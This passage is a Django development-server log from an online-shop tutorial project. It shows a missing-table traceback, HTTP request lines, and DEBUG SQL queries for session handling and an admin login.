*callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 14:01:30] "GET / HTTP/1.0" 500 197402 [28/Nov/2019 14:01:52] "GET /admin HTTP/1.0" 301 0 [28/Nov/2019 14:01:52] "GET /admin/ HTTP/1.0" 302 0 DEBUG 2019-11-28 14:01:52,760 utils 18022 140356174259968 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem' LIMIT 1; args=('djxmmwyano011ratccnh8x0yfelj6wem',) DEBUG 2019-11-28 14:01:52,763 utils 18022 140356174259968 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('djxmmwyano011ratccnh8x0yfelj6wem', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T14:01:52.761446+00:00'::timestamptz); args=('djxmmwyano011ratccnh8x0yfelj6wem', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 1, 52, 761446, tzinfo=)) [28/Nov/2019 14:01:52] "GET /admin/login/?next=/admin/ HTTP/1.0" 200 1810 [28/Nov/2019 14:01:53] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [28/Nov/2019 14:01:53] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [28/Nov/2019 14:01:53] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [28/Nov/2019 14:01:53] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [28/Nov/2019 14:01:53] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [28/Nov/2019 14:01:53] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py changed, reloading. Performing system checks... System check identified no issues (0 silenced). November 28, 2019 - 13:52:36 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-11-28 14:04:42,027 utils 18694 139696174081792 (0.007) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-11-28 14:04:42,033 utils 18694 139696174081792 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() [28/Nov/2019 14:04:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:04:44,670 utils 18694 139696074503936 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:04:44.655576+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 4, 44, 655576, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:04:44] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:04:45,045 utils 18694 139696074503936 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:04:45.035274+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 4, 45, 35274, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:04:45,098 utils 18694 139696074503936 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:04:45.096026+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 4, 45, 96026, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:04:45] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 14:04:45] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [28/Nov/2019 14:04:45] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [28/Nov/2019 14:04:45] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [28/Nov/2019 14:04:46] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [28/Nov/2019 14:04:46] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [28/Nov/2019 14:04:46] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [28/Nov/2019 14:04:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:04:57,272 utils 18694 139696059688704 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl' LIMIT 1; args=('qneh9zh2lu8pn0sk87470otci8cta4tl',) DEBUG 2019-11-28 14:04:57,274 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qneh9zh2lu8pn0sk87470otci8cta4tl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T14:04:57.273195+00:00'::timestamptz); args=('qneh9zh2lu8pn0sk87470otci8cta4tl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 4, 57, 273195, tzinfo=)) [28/Nov/2019 14:04:57] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 14:04:57] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [28/Nov/2019 14:04:57] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [28/Nov/2019 14:04:57] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [28/Nov/2019 14:04:57] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [28/Nov/2019 14:04:58] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [28/Nov/2019 14:04:58] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 DEBUG 2019-11-28 14:05:04,455 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:04.444641+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 4, 444641, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') DEBUG 2019-11-28 14:05:04,486 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:05:04.483879+00:00'::timestamptz WHERE "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 5, 4, 483879, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:04] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-28 14:05:08,380 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:08.371673+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 8, 371673, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') DEBUG 2019-11-28 14:05:08,414 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:05:08.411920+00:00'::timestamptz WHERE "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 5, 8, 411920, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:08] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-28 14:05:12,480 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:12.469924+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 12, 469924, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:12] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:05:12,773 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:12.764281+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 12, 764281, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') DEBUG 2019-11-28 14:05:12,844 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:05:12.842690+00:00'::timestamptz WHERE "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 5, 12, 842690, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 14:05:13] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:05:13,906 utils 18694 139696059688704 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sw8yj502b79g1yj4gql3yszeejei43n4' LIMIT 1; args=('sw8yj502b79g1yj4gql3yszeejei43n4',) DEBUG 2019-11-28 14:05:13,908 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sw8yj502b79g1yj4gql3yszeejei43n4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T14:05:13.906841+00:00'::timestamptz); args=('sw8yj502b79g1yj4gql3yszeejei43n4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 5, 13, 906841, tzinfo=)) [28/Nov/2019 14:05:13] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 14:05:14] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [28/Nov/2019 14:05:14] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [28/Nov/2019 14:05:14] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [28/Nov/2019 14:05:14] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [28/Nov/2019 14:05:14] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 Not Found: /favicon.ico [28/Nov/2019 14:05:15] "GET /favicon.ico HTTP/1.0" 404 6411 [28/Nov/2019 14:05:15] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 DEBUG 2019-11-28 14:05:17,143 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:17.130838+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 17, 130838, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') DEBUG 2019-11-28 14:05:17,169 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:05:17.167287+00:00'::timestamptz WHERE "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 5, 17, 167287, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:17] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-28 14:05:27,907 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:27.897576+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 27, 897576, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:27] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:05:28,204 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:28.191512+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 28, 191512, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') DEBUG 2019-11-28 14:05:28,253 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:05:28.250735+00:00'::timestamptz WHERE "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 5, 28, 250735, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:28] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-28 14:05:34,913 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:34.904931+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 34, 904931, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:34] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:05:35,205 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:35.195703+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 35, 195703, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') DEBUG 2019-11-28 14:05:35,237 utils 18694 139696059688704 (0.002) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:05:35.233721+00:00'::timestamptz WHERE "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 5, 35, 233721, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:35] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-28 14:05:36,408 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:36.400009+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 36, 400009, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:05:36,698 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:05:36.689007+00:00'::timestamptz AND "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'); args=(datetime.datetime(2019, 11, 28, 14, 5, 36, 689007, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') DEBUG 2019-11-28 14:05:36,725 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:05:36.722922+00:00'::timestamptz WHERE "django_session"."session_key" = 'qneh9zh2lu8pn0sk87470otci8cta4tl'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 5, 36, 722922, tzinfo=), 'qneh9zh2lu8pn0sk87470otci8cta4tl') [28/Nov/2019 14:05:36] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 14:09:43] "GET / HTTP/1.0" 302 0 [28/Nov/2019 14:14:54] "GET / HTTP/1.0" 302 0 [28/Nov/2019 14:20:01] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:21:40,745 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:21:40.735053+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 21, 40, 735053, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:21:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:21:41,161 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:21:41.152292+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 21, 41, 152292, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:21:41,193 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:21:41.191426+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 21, 41, 191426, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:21:41] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-28 14:21:42,414 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:21:42.405439+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 21, 42, 405439, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:21:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:21:42,795 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:21:42.783984+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 21, 42, 783984, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:21:42,847 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:21:42.844267+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 21, 42, 844267, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:21:42] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-28 14:21:49,712 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:21:49.704235+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 21, 49, 704235, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:21:49,718 utils 18694 139696059688704 (0.003) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'root'; args=('root',) DEBUG 2019-11-28 14:21:49,962 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:21:49.960574+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 21, 49, 960574, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:21:49] "POST /login/?next=/ HTTP/1.0" 200 1946 [28/Nov/2019 14:21:50] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 DEBUG 2019-11-28 14:22:15,976 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:22:15.968105+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 22, 15, 968105, tzinfo=), 